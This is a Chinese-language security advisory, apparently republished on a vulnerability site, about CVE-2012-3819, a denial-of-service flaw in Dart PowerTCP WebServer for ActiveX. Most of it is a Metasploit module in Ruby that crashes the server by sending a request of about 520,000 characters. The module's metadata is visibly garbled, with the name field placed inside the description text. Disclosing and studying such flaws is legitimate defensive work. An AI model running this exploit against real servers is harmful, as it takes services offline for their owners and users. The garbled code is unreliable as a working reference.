PowerTCP WebServer for ActiveX 拒绝服务漏洞
发布日期:2012-09-28
更新日期:2012-10-10
受影响系统:Dart Communication PowerTCP WebServer for ActiveX
描述:
BUGTRAQ ID:
55761
CVE(CAN) ID:
CVE-2012-3819
PowerTCP WebServer for ActiveX接受HTTP和HTTPS连接,可将任何意义转换为自定义Web服务器。
Dart PowerTCP WebServer for ActiveX及其他产品内使用的dartwebserver.dll 1.9及更早版本存在栈消耗漏洞,可允许远程攻击者通过较长的请求造成拒绝服务。
<*来源:catatonicprime
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
Dart Webserver from Dart Communications throws a stack
overflow exception
when processing large requests.
}
,
'Author' => [
'catatonicprime'
],
'Version' => '$Revision: 15513 $',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2012-3819' ],
],
'DisclosureDate' => '9/28/2012'))
register_options([
Opt::RPORT(80),
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
])
end
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
size = datastore['SIZE']
print_status("Crashing the server ...")
request = "A" * size + "\r\n\r\n"
connect
sock.put(request)
disconnect
end
end
建议:
厂商补丁:
Dart Communication
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dart.com浏览次数:2760
严重程度:0(网友投票)